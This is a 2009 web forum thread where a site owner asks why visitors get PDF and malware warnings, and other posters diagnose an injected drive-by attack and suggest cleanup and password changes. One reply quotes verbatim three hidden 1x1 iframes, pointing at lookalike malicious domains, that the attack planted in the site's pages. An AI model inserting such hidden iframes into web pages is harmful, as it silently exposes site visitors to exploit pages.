View Full Version : Site keeps trying to open Acrobat

04-10-2009, 05:45 AM
I was hoping someone with web security knowledge might be able to help me. I've just developed a site and I'm running into a major security problem.

Basically, when people go through my site, it keeps giving them PDF errors. The issue is I don't have any PDFs on the site at all. Its causing a possible malware error to come up in Safari and complaints on Firefox. So far no problem on IE though.

I was hoping someone might be able to help me out.


04-10-2009, 06:16 AM
You have this stuff on the bottom of your code on your site

<iframe src="http://goooogleadsence.biz/?click=31C8B0" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://google-ana1yticz.com/?click=8D375E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://xtrarobotz.com/?click=183E796" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
I'm guessing you didn't put it there. It looks like nonsense. Contact your host, change your passwords to your control panel, and ftp.

Also are you using any kind of server side language like php?

04-10-2009, 08:50 AM
I'm using PHP atm.

Thanks for noticing that, tomorrow morning I'll go through and prune all the pages to make sure its not on any more. However, unfortunately other pages I just checked on has the problem.

http://bitballot.com/admin/login and once you've logged in the first page.

If you don't mind lending me some help, pm me and I'll send you the login info (I don't wanna put it publicly as I'm not sure if it'll get spidered and then suddenly things go to hell).

04-10-2009, 08:56 AM
You could just post your php code.

04-10-2009, 04:07 PM
It's happening on multiple pages... and its a lot of code.

04-10-2009, 10:57 PM
Download all of your files, delete the code if its there, if its not in the files that you download then its an issue with your host. Again change your passwords, and usernames. I still recommend contacting your host. Maybe there have been other reports so they know it might be an issue on there end.

04-25-2009, 03:01 AM
From what I understand of this particular nasty , it uses a hole in
the adobe acrobat viewer to work it's way to getting ftp logins
to web sites and then uses those to put the nifty iframe hack in there
so as to catch more people with the crud at xtrarobotz.com

So simply cleaning up your site of the code will be fruitless
if the little bugger that is stealing your passwords still lives in you PC.

Heres one reference I found of many